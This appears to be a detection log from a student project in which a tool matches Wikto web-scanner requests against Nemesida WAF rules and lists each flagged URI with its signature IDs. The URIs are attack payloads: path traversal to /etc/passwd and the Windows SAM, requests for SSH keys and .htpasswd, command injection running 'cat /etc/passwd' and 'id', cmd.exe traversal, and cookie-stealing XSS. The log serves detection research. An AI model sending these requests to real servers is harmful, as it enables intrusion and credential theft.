# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l wikto.short -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/ficheros_uris_completos/web_estatica/nemesida/wikto_short.clean
Packet [1]	Uri [../../../../../../../../../../etc/*]	Nattacks [3]	Signatures	[300000039]	[300000057]	[300000067]
Packet [2]	Uri [../../../../../../../../../../etc/passw*]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [4]	Uri [/%00]	Nattacks [1]	Signatures	[300001359]
Packet [5]	Uri [/%00/]	Nattacks [1]	Signatures	[300001359]
Packet [6]	Uri [/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [7]	Uri [/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [9]	Uri [/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [10]	Uri [/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [12]	Uri [/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [13]	Uri [/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [16]	Uri [/%NETHOOD%/]	Nattacks [1]	Signatures	[300001517]
Packet [18]	Uri [/.%252e/.%252e/.%252e/winnt/boot.ini]	Nattacks [1]	Signatures	[300001517]
Packet [19]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam]	Nattacks [1]	Signatures	[300000067]
Packet [20]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/samSensePostNotThereNoNosam]	Nattacks [1]	Signatures	[300000067]
Packet [21]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam]	Nattacks [1]	Signatures	[300000067]
Packet [22]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._]	Nattacks [1]	Signatures	[300000067]
Packet [23]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [1]	Signatures	[300000067]
Packet [24]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [1]	Signatures	[300000067]
Packet [25]	Uri [/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam]	Nattacks [1]	Signatures	[300000067]
Packet [26]	Uri [/..%255c..%255c..%255c..%255c..%255c../windows/repair/samSensePostNotThereNoNosam]	Nattacks [1]	Signatures	[300000067]
Packet [27]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam]	Nattacks [1]	Signatures	[300000067]
Packet [28]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._]	Nattacks [1]	Signatures	[300000067]
Packet [29]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [1]	Signatures	[300000067]
Packet [30]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [1]	Signatures	[300000067]
Packet [31]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [32]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/samSensePostNotThereNoNosam]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [33]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [34]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [35]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [36]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [37]	Uri [/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [38]	Uri [/................../config.sys]	Nattacks [1]	Signatures	[300000067]
Packet [39]	Uri [/................../conSensePostNotThereNoNo.sys]	Nattacks [1]	Signatures	[300000067]
Packet [40]	Uri [/................../etc/passwd]	Nattacks [2]	Signatures	[300000067]	[300001559]
Packet [41]	Uri [/.../.../.../]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [42]	Uri [/.../.../.../.../.../.../.../.../.../.../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [43]	Uri [/.../.../.../.../.../.../.../.../.../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [44]	Uri [/../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [45]	Uri [/../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [46]	Uri [/../../../../winnt/repair/sam._]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [47]	Uri [/../../../../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [48]	Uri [/../config.dat]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [49]	Uri [/../webserver.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [50]	Uri [/..\..\..\..\..\..\temp\temp.class]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [51]	Uri [/..\\..\\..\\..\\..\\..\\..\\boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300001517]
Packet [56]	Uri [/.bash_history]	Nattacks [1]	Signatures	[300001926]
Packet [57]	Uri [/.cobalt/sysManage/../admin/.htaccess]	Nattacks [2]	Signatures	[300000067]	[300001847]
Packet [61]	Uri [/.history]	Nattacks [1]	Signatures	[300001928]
Packet [62]	Uri [/.htaccess]	Nattacks [1]	Signatures	[300001847]
Packet [63]	Uri [/.htpasswd]	Nattacks [1]	Signatures	[300001846]
Packet [65]	Uri [/.mysql_history]	Nattacks [1]	Signatures	[300001926]
Packet [67]	Uri [/.nsf/../winnt/win.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [68]	Uri [/.nsf/../winnt/winSensePostNotThereNoNo.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [69]	Uri [/.passwd]	Nattacks [1]	Signatures	[300001517]
Packet [76]	Uri [/.psql_history]	Nattacks [1]	Signatures	[300001926]
Packet [78]	Uri [/.sh_history]	Nattacks [2]	Signatures	[300001561]	[300001926]
Packet [79]	Uri [/.ssh]	Nattacks [1]	Signatures	[300001517]
Packet [80]	Uri [/.ssh/authorized_keys]	Nattacks [2]	Signatures	[300001922]	[300001924]
Packet [81]	Uri [/.ssh/autSensePostNotThereNoNokeys]	Nattacks [1]	Signatures	[300001922]
Packet [82]	Uri [/.ssh/knoSensePostNotThereNoNoosts]	Nattacks [1]	Signatures	[300001922]
Packet [83]	Uri [/.ssh/known_hosts]	Nattacks [2]	Signatures	[300001922]	[300001923]
Packet [110]	Uri [//.ssSensePostNotThereNoNo.ssh]	Nattacks [1]	Signatures	[300001517]
Packet [113]	Uri [////./../.../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [116]	Uri [///etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [120]	Uri [//accSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [135]	Uri [//admSensePostNotThereNoNo.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]]	Nattacks [2]	Signatures	[300000051]	[300002734]
Packet [188]	Uri [//banSensePostNotThereNoNo.bak]	Nattacks [1]	Signatures	[300001927]
Packet [189]	Uri [//banSensePostNotThereNoNo.dat]	Nattacks [1]	Signatures	[300001562]
Packet [190]	Uri [//banSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [201]	Uri [//bigSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [214]	Uri [//carSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [215]	Uri [//carSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [240]	Uri [//cluSensePostNotThereNoNo.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [251]	Uri [//conSensePostNotThereNoNo.inc]	Nattacks [1]	Signatures	[300001517]
Packet [262]	Uri [//cplSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [265]	Uri [//CSNSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [266]	Uri [//csPSensePostNotThereNoNo.cgi?command=remove%20]	Nattacks [1]	Signatures	[300001513]
Packet [273]	Uri [//danSensePostNotThereNoNo.dat]	Nattacks [1]	Signatures	[300001562]
Packet [275]	Uri [//datSensePostNotThereNoNo.sql]	Nattacks [1]	Signatures	[300001526]
Packet [284]	Uri [//db.SensePostNotThereNoNo.sql]	Nattacks [1]	Signatures	[300001526]
Packet [321]	Uri [//emuSensePostNotThereNoNo.cgi?type=.%00]	Nattacks [2]	Signatures	[300001359]	[300001513]
Packet [334]	Uri [//extSensePostNotThereNoNo.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1]	Signatures	[300001562]
Packet [352]	Uri [//getSensePostNotThereNoNoc.pl]	Nattacks [1]	Signatures	[300001513]
Packet [355]	Uri [//gloSensePostNotThereNoNo.inc]	Nattacks [1]	Signatures	[300001517]
Packet [359]	Uri [//gloSensePostNotThereNoNos.pl]	Nattacks [1]	Signatures	[300001513]
Packet [360]	Uri [//GozSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [405]	Uri [//indSensePostNotThereNoNo.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [406]	Uri [//indSensePostNotThereNoNo.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [484]	Uri [//logSensePostNotThereNoNo.ini]	Nattacks [1]	Signatures	[300001517]
Packet [515]	Uri [//midSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [532]	Uri [//musSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [565]	Uri [//parSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [580]	Uri [//phpSensePostNotThereNoNo.ini]	Nattacks [1]	Signatures	[300001517]
Packet [604]	Uri [//pt_SensePostNotThereNoNo.inc]	Nattacks [1]	Signatures	[300001517]
Packet [614]	Uri [//pwdSensePostNotThereNoNod.db]	Nattacks [1]	Signatures	[300001526]
Packet [618]	Uri [//quiSensePostNotThereNoNo.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [619]	Uri [//quiSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [660]	Uri [//shoSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [663]	Uri [//sitSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [669]	Uri [//smgSensePostNotThereNoNo.exe?vcc=3560121183d3]	Nattacks [1]	Signatures	[300001562]
Packet [684]	Uri [//sqlSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [685]	Uri [//sqlSensePostNotThereNoNo.sql]	Nattacks [1]	Signatures	[300001526]
Packet [690]	Uri [//ss.SensePostNotThereNoNo.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [712]	Uri [//strSensePostNotThereNoNo.sql]	Nattacks [1]	Signatures	[300001526]
Packet [755]	Uri [//urlSensePostNotThereNoNo.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [770]	Uri [//wa.SensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [772]	Uri [//WebSensePostNotThereNoNo.dll?View=Logon]	Nattacks [1]	Signatures	[300001562]
Packet [799]	Uri [//WS_SensePostNotThereNoNo.ini]	Nattacks [1]	Signatures	[300001517]
Packet [800]	Uri [//ws_SensePostNotThereNoNo.ini]	Nattacks [1]	Signatures	[300001517]
Packet [827]	Uri [/?PageServices]	Nattacks [1]	Signatures	[300001891]
Packet [828]	Uri [/?pattern=/etc/*&sort=name]	Nattacks [2]	Signatures	[300000039]	[300002734]
Packet [839]	Uri [/acart2_0/acart2_0.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [840]	Uri [/acart2_0/acaSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [847]	Uri [/access.log]	Nattacks [1]	Signatures	[300001518]
Packet [858]	Uri [/active.log]	Nattacks [1]	Signatures	[300001518]
Packet [864]	Uri [/admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]]	Nattacks [2]	Signatures	[300000051]	[300002734]
Packet [867]	Uri [/admcgi/scripts/Fpadmcgi.exe]	Nattacks [1]	Signatures	[300001562]
Packet [868]	Uri [/admcgi/scripts/FpaSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [873]	Uri [/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [874]	Uri [/admin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [888]	Uri [/admin/admin_phpinfo.php4]	Nattacks [1]	Signatures	[300001887]
Packet [897]	Uri [/admin/cfg/configscreen.inc.php+]	Nattacks [1]	Signatures	[300001512]
Packet [898]	Uri [/admin/cfg/configsite.inc.php+]	Nattacks [1]	Signatures	[300001512]
Packet [899]	Uri [/admin/cfg/configsql.inc.php+]	Nattacks [1]	Signatures	[300001512]
Packet [900]	Uri [/admin/cfg/configtache.inc.php+]	Nattacks [1]	Signatures	[300001512]
Packet [906]	Uri [/admin/cplogfile.log]	Nattacks [1]	Signatures	[300001518]
Packet [907]	Uri [/admin/cplSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [910]	Uri [/admin/database/wwForum.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [911]	Uri [/admin/database/wwFSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [917]	Uri [/admin/exec.php3?cmd=cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [924]	Uri [/admin/modules/cache.php+]	Nattacks [1]	Signatures	[300001512]
Packet [928]	Uri [/admin/phpinfo.php]	Nattacks [1]	Signatures	[300001887]
Packet [933]	Uri [/admin/settings.inc.php+]	Nattacks [1]	Signatures	[300001512]
Packet [935]	Uri [/admin/system.php3?cmd=cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [938]	Uri [/admin/templates/header.php]	Nattacks [1]	Signatures	[300001917]
Packet [952]	Uri [/Admin_files/order.log]	Nattacks [1]	Signatures	[300001518]
Packet [953]	Uri [/Admin_files/ordSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [973]	Uri [/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [978]	Uri [/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]	[300001513]
Packet [979]	Uri [/ans/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]	[300001513]
Packet [1005]	Uri [/ASP/cart/database/metacart.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [1006]	Uri [/ASP/cart/database/metSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [1010]	Uri [/athenareg.php?pass=%20;cat%20/etc/passwd]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1011]	Uri [/atomicboard/index.php?location=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1015]	Uri [/autohtml.php?op=modload&mainfile=x&name=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1018]	Uri [/axis-cgi/buffer/command.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1019]	Uri [/axis-cgi/buffer/comSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1028]	Uri [/backup/]	Nattacks [1]	Signatures	[300002856]
Packet [1031]	Uri [/ban.bak]	Nattacks [1]	Signatures	[300001927]
Packet [1032]	Uri [/ban.dat]	Nattacks [1]	Signatures	[300001562]
Packet [1033]	Uri [/ban.log]	Nattacks [1]	Signatures	[300001518]
Packet [1036]	Uri [/bandwidth/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1037]	Uri [/bandwidth/indSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1041]	Uri [/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1043]	Uri [/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1059]	Uri [/bigconf.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1064]	Uri [/bin/admin.pl]	Nattacks [2]	Signatures	[300001053]	[300001513]
Packet [1065]	Uri [/bin/admSensePostNotThereNoNon.pl]	Nattacks [2]	Signatures	[300001053]	[300001513]
Packet [1066]	Uri [/bin/cfgSensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001053]	[300001562]
Packet [1067]	Uri [/bin/cfgwiz.exe]	Nattacks [2]	Signatures	[300001053]	[300001562]
Packet [1068]	Uri [/bin/CGImail.exe]	Nattacks [2]	Signatures	[300001053]	[300001562]
Packet [1069]	Uri [/bin/CGISensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001053]	[300001562]
Packet [1070]	Uri [/bin/common/user_update_passwd.pl]	Nattacks [2]	Signatures	[300001053]	[300001513]
Packet [1071]	Uri [/bin/common/useSensePostNotThereNoNod.pl]	Nattacks [2]	Signatures	[300001053]	[300001513]
Packet [1076]	Uri [/bin/fpremadm.exe]	Nattacks [2]	Signatures	[300001053]	[300001562]
Packet [1077]	Uri [/bin/fprSensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001053]	[300001562]
Packet [1078]	Uri [/bin/fpsrvadm.exe]	Nattacks [2]	Signatures	[300001053]	[300001562]
Packet [1079]	Uri [/bin/fpsSensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001053]	[300001562]
Packet [1084]	Uri [/blah-whatever-badfile.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1085]	Uri [/blah-whatever.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1091]	Uri [/board/philboard_admin.asp+]	Nattacks [1]	Signatures	[300001856]
Packet [1093]	Uri [/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1094]	Uri [/boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]
Packet [1107]	Uri [/bytehoard/index.php?infolder=../../../../../../../../../../../etc/]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1109]	Uri [/c/winnt/system32/cmd.exe?/c+dir+/OG]	Nattacks [1]	Signatures	[300001562]
Packet [1112]	Uri [/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300001517]
Packet [1113]	Uri [/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd]	Nattacks [2]	Signatures	[300000057]	[300000066]
Packet [1114]	Uri [/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini]	Nattacks [4]	Signatures	[300000057]	[300000066]	[300000067]	[300001517]
Packet [1118]	Uri [/carbo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [1122]	Uri [/cartcart.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1145]	Uri [/ccbill/secure/ccbill.log]	Nattacks [1]	Signatures	[300001518]
Packet [1146]	Uri [/ccbill/secure/ccbSensePostNotThereNoNo.log]	Nattacks [1]	Signatures	[300001518]
Packet [1147]	Uri [/ccbill/whereami.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1148]	Uri [/ccbill/wheSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1149]	Uri [/cd-cgi/sscd_suncourier.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1150]	Uri [/cd-cgi/sscSensePostNotThereNoNor.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1161]	Uri [/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [1162]	Uri [/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [1163]	Uri [/cfappman/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1167]	Uri [/cfdocs/cfmlsyntaxcheck.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1168]	Uri [/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini]	Nattacks [1]	Signatures	[300001516]
Packet [1169]	Uri [/cfdocs/exampleapp/email/application.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1170]	Uri [/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini]	Nattacks [1]	Signatures	[300001516]
Packet [1171]	Uri [/cfdocs/exampleapp/publish/admin/addcontent.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1172]	Uri [/cfdocs/exampleapp/publish/admin/application.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1173]	Uri [/cfdocs/examples/cvbeans/beaninfo.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1174]	Uri [/cfdocs/examples/httpclient/mainframeset.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1175]	Uri [/cfdocs/examples/parks/detail.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1176]	Uri [/cfdocs/expeval/displayopenedfile.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1177]	Uri [/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini]	Nattacks [1]	Signatures	[300001516]
Packet [1178]	Uri [/cfdocs/expeval/openfile.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1179]	Uri [/cfdocs/expeval/sendmail.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1180]	Uri [/cfdocs/snippets/evaluate.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1181]	Uri [/cfdocs/snippets/fileexists.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1182]	Uri [/cfdocs/snippets/gettempdirectory.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1183]	Uri [/cfdocs/snippets/viewexample.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1184]	Uri [/CFIDE/administrator/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1185]	Uri [/cfide/administrator/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1188]	Uri [/CFIDE/probe.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1189]	Uri [/cgi-bin-sdb/printenv]	Nattacks [1]	Signatures	[300001826]
Packet [1190]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001562]
Packet [1191]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001562]
Packet [1193]	Uri [/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [1194]	Uri [/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [1195]	Uri [/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E]	Nattacks [6]	Signatures	[300000051]	[300000052]	[300000508]	[300000515]	[300000537]	[300001513]
Packet [1196]	Uri [/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1197]	Uri [/cgi-bin/.cobalt/siteUserMod/sitSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1198]	Uri [/cgi-bin/admin.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1199]	Uri [/cgi-bin/admin/admin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1200]	Uri [/cgi-bin/admin/admSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1201]	Uri [/cgi-bin/admin/setSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1202]	Uri [/cgi-bin/admin/setup.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1203]	Uri [/cgi-bin/admSensePostNotThereNoNon.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1204]	Uri [/cgi-bin/bigconf.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1205]	Uri [/cgi-bin/bigSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1206]	Uri [/cgi-bin/cfgSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1207]	Uri [/cgi-bin/cfgwiz.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1208]	Uri [/cgi-bin/cgi-test.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1209]	Uri [/cgi-bin/CGImail.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1210]	Uri [/cgi-bin/CGISensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1211]	Uri [/cgi-bin/cgiSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1214]	Uri [/cgi-bin/common/lisSensePostNotThereNoNoc.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1215]	Uri [/cgi-bin/common/listrec.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1218]	Uri [/cgi-bin/csv_db.cgi?file=|id|]	Nattacks [1]	Signatures	[300001513]
Packet [1219]	Uri [/cgi-bin/dbmlparser.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1220]	Uri [/cgi-bin/dbmSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1223]	Uri [/cgi-bin/fpremadm.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1224]	Uri [/cgi-bin/fprSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1225]	Uri [/cgi-bin/fpsrvadm.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1226]	Uri [/cgi-bin/fpsSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1231]	Uri [/cgi-bin/handler/netsonar;cat	/etc/passwd|?data=Download]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1235]	Uri [/cgi-bin/jammail.pl?job=showoldmail&mail=|id|]	Nattacks [1]	Signatures	[300001513]
Packet [1238]	Uri [/cgi-bin/main_menu.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1239]	Uri [/cgi-bin/pfdisplay.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1240]	Uri [/cgi-bin/pfdSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1241]	Uri [/cgi-bin/printenv]	Nattacks [1]	Signatures	[300001826]
